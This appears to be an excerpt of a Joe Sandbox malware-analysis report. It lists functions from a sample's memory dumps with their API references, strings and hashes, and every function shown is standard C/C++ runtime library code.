Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Strings

HaV, xrefs: 0040558D, 004055DD

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: HaV
API String ID: 2243866535-2133240653
Opcode ID: 77bb5cf698310b8ba390bd61355b52a0ac70b2f21dca2487d2fd28bc22ac2b2d
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: 77bb5cf698310b8ba390bd61355b52a0ac70b2f21dca2487d2fd28bc22ac2b2d
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 0213C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0213C6DC
atomic_compare_exchange.LIBCONCRT ref: 0213C700
std::_Cnd_initX.LIBCPMT ref: 0213C711
std::_Cnd_initX.LIBCPMT ref: 0213C71F

Part of subcall function 02121370: __Mtx_unlock.LIBCPMT ref: 02121377

std::_Cnd_initX.LIBCPMT ref: 0213C72F

Part of subcall function 0213C3EF: __Cnd_broadcast.LIBCPMT ref: 0213C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0213C73D

Strings

t#D, xrefs: 0213C6C2

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: 14effb6c144d1dffdaa6e21f5408c066cd4254dcc5133b9846a3fe565ec13c71
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: E501F772980605AFCB12F770CD89B9EB36BBF04310F140151E804A7680EB78AB158FD2

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 02151129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

_free.LIBCMT ref: 02151444
_free.LIBCMT ref: 0215145D
_free.LIBCMT ref: 0215148F
_free.LIBCMT ref: 02151498
_free.LIBCMT ref: 021514A4

Strings

C, xrefs: 02151291

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
Instruction ID: 1f96c16e39514c5c7dd4696c4b36c56030514b787d9461cc52c4e21015c2c68a
Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
Instruction Fuzzy Hash: A8B11575A41229EFDB25DF28C884BA9B7B5FB08314F1045EAD86DA7350D730AE90CF80

Function 0215A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0215A184
_free.LIBCMT ref: 0215A192
_free.LIBCMT ref: 0215A2C0
_free.LIBCMT ref: 0215A2CB

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
Instruction ID: 6a8a12aa092e520d54527652bebb66444823b46418dad9658c774e153f887e89
Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
Instruction Fuzzy Hash: 8561A471980225EFDB20DF68C842B9ABBF5EF45710F2442EAED64EB241D7719941CF90

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 02153AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0215425F,?,?,?,?,?,?), ref: 02153B2C
__fassign.LIBCMT ref: 02153BA7
__fassign.LIBCMT ref: 02153BC2
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 02153BE8
WriteFile.KERNEL32(?,?,00000000,0215425F,00000000,?,?,?,?,?,?,?,?,?,0215425F,?), ref: 02153C07
WriteFile.KERNEL32(?,?,00000001,0215425F,00000000,?,?,?,?,?,?,?,?,?,0215425F,?), ref: 02153C40

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
Instruction ID: be00d781b372c3c36378d37014bed2c16876b296bbfc14142239cc611d8f0a56
Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
Instruction Fuzzy Hash: 5951D575900219EFCB10CFA8D884AEEBBF5EF09714F14419AE965E7391D7309A81CF64

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 02144AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02144ACD

Part of subcall function 02144D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02144800), ref: 02144DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02144AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02144AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02144AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02144B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02144BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02144BC3

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 871241d299872db596c86fcc788082bf603c03df7d5c7aa2a1b714b3aaec6c49
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: F731E639A402159FCF18EF68C881B6DB3B6FF44320F214566E929AB241DF70EE15CB94

Function 0215FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
Instruction ID: a9caa8a928f6b9fdedff8fc61d8b71c4bbbbb78721606a9935202dd8373cff20
Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
Instruction Fuzzy Hash: 7911B471584129FFDB252F768C48D6B7AADEF82761B110AB5FC39C7240DF308902CAA0

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 0215A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0215A331: _free.LIBCMT ref: 0215A35A

_free.LIBCMT ref: 0215A638

Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9

_free.LIBCMT ref: 0215A643
_free.LIBCMT ref: 0215A64E
_free.LIBCMT ref: 0215A6A2
_free.LIBCMT ref: 0215A6AD
_free.LIBCMT ref: 0215A6B8
_free.LIBCMT ref: 0215A6C3

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 381732e80f92289c5a8e345c107efc5cfbfa7df7b048c66456b090b09f108c6b
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 471172316C4B24EEDE60B771CC49FCB77DEDF00740F400DAAAAB9AA250D764B5548E90

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 02132659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 02132667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 0213266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 0213269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 021326A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 021326B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021326CC
__CxxThrowException@8.LIBVCRUNTIME ref: 021326DA

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: dcd173175c0b0f36d6569081422e67ebc934e3bc49d12ad18deaa872e233b68f
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: 3E01F275680125ABDB26BF65EC08FAF376AAF42B52B100435FC05D3060EB34DE048BE8

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 021324A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0213670B), ref: 021324B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021324C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021324D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0213670B), ref: 02132500
GetProcAddress.KERNEL32(00000000), ref: 02132507
GetLastError.KERNEL32(?,?,?,0213670B), ref: 02132522
GetLastError.KERNEL32(?,?,?,0213670B), ref: 0213252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132544
__CxxThrowException@8.LIBVCRUNTIME ref: 02132552

Strings

kernel32.dll, xrefs: 021324B0, 021324B5, 021324FA

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: a74a6c5c94aeb9bd67de0fe2ec92db029063b6cc8f87f4958e337263bc7c364d
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 13F0A9769403107FF7123B757C5995B3FAEDE4AA273200636F811E2191EB75C9018559

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::eofbit set, xrefs: 0040C649
F(@, xrefs: 0040C61B
ios_base::failbit set, xrefs: 0040C644
F(@, xrefs: 0040C651

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 02151991 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 021519AF

Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9

_free.LIBCMT ref: 021519C1
_free.LIBCMT ref: 021519D4
_free.LIBCMT ref: 021519E5
_free.LIBCMT ref: 021519F6

Strings

8JV, xrefs: 02151991, 021519A0, 021519AE, 021519B5

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 8JV
API String ID: 776569668-1571241588
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 1725d44b4e6a4aee4839877d31c7c9274626910bd7a396e28f3d6006823ec2c2
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 9FF01D70D44320EB9F616F14AC844043BA1AF0976270006EAF826977B2C774D9A2DFCE

Function 0043172A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Strings

8JV, xrefs: 0043172A, 00431739, 0043174E

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 8JV
API String ID: 776569668-1571241588
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 0215239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021525EC,00000001,00000001,?), ref: 021523F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021525EC,00000001,00000001,?,?,?,?), ref: 0215247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02152575
__freea.LIBCMT ref: 02152582

Part of subcall function 0215390E: RtlAllocateHeap.NTDLL(00000000,0212DAD7,00000000), ref: 02153940

__freea.LIBCMT ref: 0215258B
__freea.LIBCMT ref: 021525B0

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
Instruction ID: e98950377e1442dc3707c3dc34fb4a75437921014336a096e8d7f9437cfde6db
